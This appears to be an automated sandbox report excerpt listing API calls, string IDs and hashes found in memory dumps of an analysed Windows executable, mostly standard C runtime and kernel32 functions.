                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EAF055,00E735BB,?,00EAF01D,?,?,00E735BB), ref: 00EAF075
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EAF088
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00EAF055,00E735BB,?,00EAF01D,?,?,00E735BB), ref: 00EAF0AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 10d8be9a9153a915b919e85660a000fe5a2777643698a10ffcb9ae7139ba06de
                                                                    • Instruction ID: d359551d1a36af6391b173ae0c887774c67f96b57ac81ae8bfff18a63e01e8b1
                                                                    • Opcode Fuzzy Hash: 10d8be9a9153a915b919e85660a000fe5a2777643698a10ffcb9ae7139ba06de
                                                                    • Instruction Fuzzy Hash: FBF08C31901218FFCB22AB96DC0AF9DBB78EF04759F084070F800B61A0CB728E46DA91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll,SystemFunction036,?,?,?,00E5A4C9,000001F4,000001F4,000001F4,000001F4,000001F4,000001F4,2B749D79), ref: 00E8CD0A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00E8CD11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Advapi32.dll$SystemFunction036$rtl failed,contact support
                                                                    • API String ID: 2574300362-1663652356
                                                                    • Opcode ID: a2c822e9a26ed89d1644ada9b02ba9edea03b454f57f4fd53896a6e95b1f72ff
                                                                    • Instruction ID: 670a1b2d5a4260862921962bab039f3518ba93dae26bf6c547a24750b37298ce
                                                                    • Opcode Fuzzy Hash: a2c822e9a26ed89d1644ada9b02ba9edea03b454f57f4fd53896a6e95b1f72ff
                                                                    • Instruction Fuzzy Hash: 9CE022B29402689A8534BB696C0AA9A3959E3C271AB21213AED0EF2190E731440742B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB559C
                                                                    • _free.LIBCMT ref: 00EB4BDA
                                                                    • _free.LIBCMT ref: 00EB4BF3
                                                                    • _free.LIBCMT ref: 00EB4C31
                                                                    • _free.LIBCMT ref: 00EB4C3A
                                                                    • _free.LIBCMT ref: 00EB4C46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3291180501-0
                                                                    • Opcode ID: 411ca5e0d7d53cd11bc8662eefb54b94116ec00d2e7754d716f04a7941dbbe22
                                                                    • Instruction ID: 286ff61d78910ebb0236754632f814351a4cb8a79f4a96ee93f3e4cc89500056
                                                                    • Opcode Fuzzy Hash: 411ca5e0d7d53cd11bc8662eefb54b94116ec00d2e7754d716f04a7941dbbe22
                                                                    • Instruction Fuzzy Hash: 96B11BB5A016199FDB24DF18C885BEAB7B4FF48314F1055EAE949A7391D731AE80CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB649C: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00EA8D0C,?,?,000000FF,?,?,00E820BF,?,?), ref: 00EB64CE
                                                                    • _free.LIBCMT ref: 00EB4551
                                                                    • _free.LIBCMT ref: 00EB4568
                                                                    • _free.LIBCMT ref: 00EB4585
                                                                    • _free.LIBCMT ref: 00EB45A0
                                                                    • _free.LIBCMT ref: 00EB45B7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3033488037-0
                                                                    • Opcode ID: 90fa86f6438335aba64400274884bed068abdf5a3591ab2f6aaae5d7ad53095a
                                                                    • Instruction ID: 88f626044a0bf12d4ed9a46d112876c9e9b3772cfc7ed7aaab1ed8c89a0de64d
                                                                    • Opcode Fuzzy Hash: 90fa86f6438335aba64400274884bed068abdf5a3591ab2f6aaae5d7ad53095a
                                                                    • Instruction Fuzzy Hash: 7B51E3B2A00604AFDB20DF69DC41BAB73F4EF49724F041569E859F72A2E731EE018B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBE31F
                                                                      • Part of subcall function 00EB5945: HeapFree.KERNEL32(00000000,00000000,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(?,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?,?), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBE331
                                                                    • _free.LIBCMT ref: 00EBE343
                                                                    • _free.LIBCMT ref: 00EBE355
                                                                    • _free.LIBCMT ref: 00EBE367
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d43ad76d4f5631fbfbfe44a49154133ae075ef20931638a7b9a2f459b0f351a1
                                                                    • Instruction ID: 301c80cb489644371aa6b72d15010dfbf1dc9de8cf2c48cd299f8eeaf0a3130d
                                                                    • Opcode Fuzzy Hash: d43ad76d4f5631fbfbfe44a49154133ae075ef20931638a7b9a2f459b0f351a1
                                                                    • Instruction Fuzzy Hash: 43F06233505688EF8660EBA5E4C1CEB77F9AB817307542809F058FB611C730FC804650
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00E8701C
                                                                    • WriteFile.KERNEL32(00000000,-00000002,00000000,00000000,?,00F2C0CC), ref: 00E870C6
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E870DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileMtx_unlockStartupWrite
                                                                    • String ID: ild
                                                                    • API String ID: 3902326042-1003530327
                                                                    • Opcode ID: 03b8d3b7e8b47275f1c81cd10e6486e3eac5bbe547ab5926ee531cb93c7f745b
                                                                    • Instruction ID: 09c08b9f5b541e73df8fbae584ed56aeaa2b16d7c0c663dc198ff070673a2314
                                                                    • Opcode Fuzzy Hash: 03b8d3b7e8b47275f1c81cd10e6486e3eac5bbe547ab5926ee531cb93c7f745b
                                                                    • Instruction Fuzzy Hash: 18315771909749DFD720DF64DC46BAAB7E8FB09300F045269ED89A73E1E730AA04C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: c0503cc23c416d0e1b6744971e7bf55034f83e41fd8f886db5c5789adbe50554
                                                                    • Instruction ID: bf97a9d8b5aa64ceb58bbfb704a5181ec3c16995394ba85ea12646e0d6054010
                                                                    • Opcode Fuzzy Hash: c0503cc23c416d0e1b6744971e7bf55034f83e41fd8f886db5c5789adbe50554
                                                                    • Instruction Fuzzy Hash: D3B11072A002859FDB15CF68C891BEFBBF5EF45304F14A1AAE855FB241D6389D02CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E803A9
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E803AE
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E803B3
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E803B8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID:
                                                                    • API String ID: 118556049-0
                                                                    • Opcode ID: 3c90bd38d4ef85e426e83cc9dea3367b2eb274fdaf4007c103b5d1bbc36c5700
                                                                    • Instruction ID: cc2f2b34e79ce43008a69b4cabff8664d5771e56a4af4b277840112378a6b703
                                                                    • Opcode Fuzzy Hash: 3c90bd38d4ef85e426e83cc9dea3367b2eb274fdaf4007c103b5d1bbc36c5700
                                                                    • Instruction Fuzzy Hash: AC719F75A00215CFCB54EF58C440A6EBBF1FF89310F24866AE859AB391D731AD41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB54FE
                                                                    • _free.LIBCMT ref: 00EB555B
                                                                    • _free.LIBCMT ref: 00EB5591
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,?,?), ref: 00EB559C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: abbcb508250e5450f11149c37b20cff811340f34c2a1523c01b75d08d0837622
                                                                    • Instruction ID: 1f79c522a87d7e389fc7f23bba3356a25260841f88ec22cb220fa5026a0bf99e
                                                                    • Opcode Fuzzy Hash: abbcb508250e5450f11149c37b20cff811340f34c2a1523c01b75d08d0837622
                                                                    • Instruction Fuzzy Hash: AF11C633206D49AED63127B5ECC6FEB229BCBC57797342634F220B61E2DE22CD054611
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,?,00EABF56,00000000,?,00EABFCE,00000000,00000000,00000000,00000000,00000000,00F2C0FC,00E5992A,?,?), ref: 00EB5655
                                                                    • _free.LIBCMT ref: 00EB56B2
                                                                    • _free.LIBCMT ref: 00EB56E8
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00EABF56,00000000,?,00EABFCE,00000000,00000000,00000000,00000000,00000000,00F2C0FC), ref: 00EB56F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 243f5573eba49ee350eb796bceda428162f6f5d03837dcb6b66a3a603ddba70c
                                                                    • Instruction ID: cd0922f9dd3799cba7df75dd222612b004dbed7b131561dfa66706c7b33d3501
                                                                    • Opcode Fuzzy Hash: 243f5573eba49ee350eb796bceda428162f6f5d03837dcb6b66a3a603ddba70c
                                                                    • Instruction Fuzzy Hash: 90114833201E09AEC62227B9EC82FEB239A9BC5778B742238F520B61E6DE61CC054110
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(000000FF,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00E6B372
                                                                    • WriteFile.KERNEL32(00000000,?,?,2B749D79,00000000), ref: 00E6B38A
                                                                    • FlushFileBuffers.KERNEL32(00000000), ref: 00E6B391
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E6B398
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateFlushHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 4137531733-0
                                                                    • Opcode ID: 7f8bfc9c82edf564d59fb2aeac30ad881fffc1d980383e200829a5dafe12cb67
                                                                    • Instruction ID: e5ea3ec5a913a675a8b18a3a3dc143a043988f19aee4ae91a07e4df21714d9a3
                                                                    • Opcode Fuzzy Hash: 7f8bfc9c82edf564d59fb2aeac30ad881fffc1d980383e200829a5dafe12cb67
                                                                    • Instruction Fuzzy Hash: CB118F31544258AFC710DF65DD49FDE7BB8EB09720F104229F921B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5,00000000,00E84B93,2B749D79,?,00000000), ref: 00E84100
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8411B
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8413B
                                                                    • CreateThread.KERNEL32 ref: 00E84159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Create$Event$Thread
                                                                    • String ID:
                                                                    • API String ID: 2525963256-0
                                                                    • Opcode ID: 5c5b4126b5f37fd1be572332dff6c8a7d84ec40c39b5277ea031a95df19a0bca
                                                                    • Instruction ID: 9b0633a7be8fcde1bb37926f1cb91584eba31e124363f5fc89db46c1875553d1
                                                                    • Opcode Fuzzy Hash: 5c5b4126b5f37fd1be572332dff6c8a7d84ec40c39b5277ea031a95df19a0bca
                                                                    • Instruction Fuzzy Hash: EA0121B0385702ABE3301F669C1AF127AE4AB04B05F10542CF749BA5D0D7F1E4058B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,CCCCC369,147983CC,00000000,00000000,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000), ref: 00EC3D5E
                                                                    • GetLastError.KERNEL32(?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000,00000000,?,00EB7ED7,00000000), ref: 00EC3D6A
                                                                      • Part of subcall function 00EC3D30: CloseHandle.KERNEL32(FFFFFFFE,00EC3D7A,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000,00000000), ref: 00EC3D40
                                                                    • ___initconout.LIBCMT ref: 00EC3D7A
                                                                      • Part of subcall function 00EC3CED: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EC3D1C,00EC1DFA,00000000,?,00EB7983,00000000,?,00000000,00000000), ref: 00EC3D00
                                                                    • WriteConsoleW.KERNEL32(00000000,CCCCC369,147983CC,00000000,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000), ref: 00EC3D8F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: ceead691f3d03e3afdebb4ddeaef66c933ce7b4a79e952f6bbc4a862d7ac0eff
                                                                    • Instruction ID: 5c330a6675e7c2c796025a5e3b468d6db5a41babb7c6ec253e6bfb1d24cee53e
                                                                    • Opcode Fuzzy Hash: ceead691f3d03e3afdebb4ddeaef66c933ce7b4a79e952f6bbc4a862d7ac0eff
                                                                    • Instruction Fuzzy Hash: B7F01236501159BFCF221FE6DC08E8D7F66FB85360F048025F909A5130C6338D219B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,00EA7DAF,00000064), ref: 00EA7E35
                                                                    • LeaveCriticalSection.KERNEL32(00F2B6C4,00000000,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,2B749D79,?,00EE45A8), ref: 00EA7E3F
                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,2B749D79,?,00EE45A8), ref: 00EA7E50
                                                                    • EnterCriticalSection.KERNEL32(00F2B6C4,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,2B749D79,?,00EE45A8), ref: 00EA7E57
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID:
                                                                    • API String ID: 3269011525-0
                                                                    • Opcode ID: b996fe9b17d44e171979db7bb211bfa1c39d2f8d6f29737f793013abddbfbf90
                                                                    • Instruction ID: 58ef710a62f1ccb57108df38dc3a51aa5562ab1ba6630385e173baa32dcab282
                                                                    • Opcode Fuzzy Hash: b996fe9b17d44e171979db7bb211bfa1c39d2f8d6f29737f793013abddbfbf90
                                                                    • Instruction Fuzzy Hash: B6E01236546138BFC6115F55FC0CE997F29AF0AB55B0440B4FD0976170C7635D02ABD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81C7B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E81CDE
                                                                      • Part of subcall function 00EA6394: _Yarn.LIBCPMT ref: 00EA63B3
                                                                      • Part of subcall function 00EA6394: _Yarn.LIBCPMT ref: 00EA63D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 1908188788-1405518554
                                                                    • Opcode ID: a103fb1784744b062911b31d78b4abe98fdf94c46f1f47f5f3644109f08ad1f8
                                                                    • Instruction ID: 1e1b19ff80be3f284a8ca8d4ef966abb244f9a2cc1aa7de4e00d232096b60cf3
                                                                    • Opcode Fuzzy Hash: a103fb1784744b062911b31d78b4abe98fdf94c46f1f47f5f3644109f08ad1f8
                                                                    • Instruction Fuzzy Hash: B131D371904784EFD720CF68C900B8ABBE8EB19714F1486AEE455A7781D7B5AA04CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%